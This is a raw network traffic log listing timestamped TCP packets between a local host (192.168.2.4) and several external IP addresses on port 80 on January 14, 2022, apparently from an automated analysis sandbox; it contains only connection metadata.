Jan 14, 2022 00:16:11.696078062 CET	80	49914	185.163.204.22	192.168.2.4
Jan 14, 2022 00:16:11.696261883 CET	49914	80	192.168.2.4	185.163.204.22
Jan 14, 2022 00:16:11.701440096 CET	80	49913	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:11.701548100 CET	49913	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:11.701996088 CET	49913	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:11.702018976 CET	49913	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:11.753680944 CET	80	49913	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:11.780124903 CET	80	49913	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:11.780287981 CET	49913	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:12.289566040 CET	49913	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:12.330293894 CET	49914	80	192.168.2.4	185.163.204.22
Jan 14, 2022 00:16:12.339976072 CET	80	49913	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:12.356694937 CET	80	49914	185.163.204.22	192.168.2.4
Jan 14, 2022 00:16:12.478744030 CET	80	49914	185.163.204.22	192.168.2.4
Jan 14, 2022 00:16:12.478799105 CET	80	49914	185.163.204.22	192.168.2.4
Jan 14, 2022 00:16:12.478944063 CET	49914	80	192.168.2.4	185.163.204.22
Jan 14, 2022 00:16:12.481774092 CET	80	49914	185.163.204.22	192.168.2.4
Jan 14, 2022 00:16:12.481822014 CET	80	49914	185.163.204.22	192.168.2.4
Jan 14, 2022 00:16:12.481832981 CET	80	49914	185.163.204.22	192.168.2.4
Jan 14, 2022 00:16:12.481996059 CET	49914	80	192.168.2.4	185.163.204.22
Jan 14, 2022 00:16:12.494991064 CET	49915	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:12.547852039 CET	80	49915	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:12.547969103 CET	49915	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:12.548048019 CET	49915	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:12.549527884 CET	49915	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:12.600112915 CET	80	49915	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:12.601646900 CET	80	49915	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:12.626549959 CET	80	49915	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:12.626652956 CET	49915	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:12.626837969 CET	49915	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:12.659136057 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:12.680604935 CET	80	49915	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:12.685560942 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:12.685740948 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:12.686170101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.693473101 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.695106030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.695319891 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.695446968 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.695570946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.695691109 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.695799112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.695914030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.696026087 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.696135998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.696245909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.696419954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.696543932 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.696670055 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.696805954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.696923971 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.697046995 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.697164059 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.697297096 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.697408915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.697535992 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.697664022 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.697779894 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.697905064 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.698021889 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.698143959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.698263884 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.698380947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.698507071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.698645115 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.698766947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.698885918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.699009895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.699135065 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.699249983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.699357033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.699467897 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.699585915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.699693918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.699807882 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.699925900 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.700045109 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.700165033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.700279951 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.700404882 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.700534105 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.700669050 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.700786114 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.700911999 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.701033115 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.701145887 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.701256990 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.701368093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.701482058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.701605082 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.701716900 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.701827049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.701937914 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.702052116 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.702157021 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.702270985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.702389002 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.702503920 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.702661037 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.702769041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.702894926 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.703262091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.703438997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.703545094 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.703658104 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.703756094 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.703850985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.703947067 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.704035997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.704132080 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.704226017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.704322100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.704437971 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.704546928 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.704646111 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.704744101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.704864979 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.704948902 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.705044031 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.705144882 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.705245018 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.705344915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.705446959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.705549002 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.705672026 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.705763102 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.705868006 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.705962896 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.706062078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.706165075 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.706267118 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.706368923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.706465006 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.706572056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.706670046 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.706779003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.706873894 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.706969023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.707062006 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.707158089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.707251072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.711798906 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.712007999 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.712114096 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.712207079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.712301016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.712420940 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.712519884 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.712627888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.712722063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.712816000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.712912083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.713006020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.713100910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.713213921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.713304996 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.713397980 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.713490009 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.713587999 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.713680029 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.713776112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.713867903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.713962078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.714056969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.714149952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.714242935 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.714337111 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.714437962 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.714530945 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.714627028 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.714720964 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.714813948 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.714907885 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.715002060 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.715094090 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.715190887 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.715282917 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.715377092 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.715470076 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.715564013 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.715657949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.715754032 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.715847015 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.715938091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.716031075 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.716126919 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.716219902 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.716315985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.716409922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.716506958 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.716600895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.716696978 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.716789961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.716886044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.716976881 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.717073917 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.717168093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.717263937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.717355967 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.717453003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.717545986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.717643023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.717736006 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.717827082 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.717919111 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.718015909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.718106985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.718202114 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.718295097 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.718389988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.718481064 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.718578100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.718669891 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.718770981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.718863964 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.718959093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.719053030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.719146967 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.719239950 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.719335079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.719429016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.719526052 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.742616892 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:12.742664099 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:12.747684002 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:12.754484892 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:12.754503012 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:12.754573107 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:12.754698038 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:12.755032063 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:12.755377054 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:12.755393028 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:12.755408049 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:12.755423069 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:12.756408930 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:12.756788969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.756876945 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.756979942 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.757121086 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.757316113 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.757482052 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.757615089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.757730007 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.757788897 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:12.757803917 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:12.757813931 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:12.757837057 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:12.757925987 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.757939100 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:12.758078098 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.758203030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.758317947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.758438110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.758559942 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.758620977 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:12.758721113 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.758852005 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.758943081 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.759032965 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.759135008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.759215117 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.759300947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.759386063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.759468079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.759562016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.764303923 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.764463902 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.764513969 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.768835068 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:12.768927097 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:12.769577980 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:12.780158997 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:12.786881924 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:12.797272921 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:12.835273981 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.835494995 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.835540056 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.835578918 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.835618019 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.835656881 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.835676908 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.835695982 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.835709095 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.835736036 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.835774899 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.835777044 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.835814953 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.835830927 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.835855961 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.835906982 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.849265099 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:12.906582117 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.906613111 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.906641006 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.906680107 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.906703949 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.906730890 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.906759024 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.906758070 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.906783104 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.906791925 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.906797886 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.906809092 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.906831980 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.906835079 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.906861067 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.906886101 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.906887054 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.906913042 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.906938076 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.906938076 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.906963110 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.906986952 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.906989098 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.907012939 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.907037973 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.907037973 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.907063007 CET	80	49917	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:12.907087088 CET	49917	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:12.931902885 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.932482004 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.932499886 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.932507038 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.932511091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.932516098 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.932548046 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.932641983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.932723999 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.932811975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.932894945 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.932977915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.933078051 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.933168888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.933249950 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.933331966 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.933418036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.933504105 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.933599949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.933677912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:12.933763981 CET	49902	80	192.168.2.4	185.215.113.35
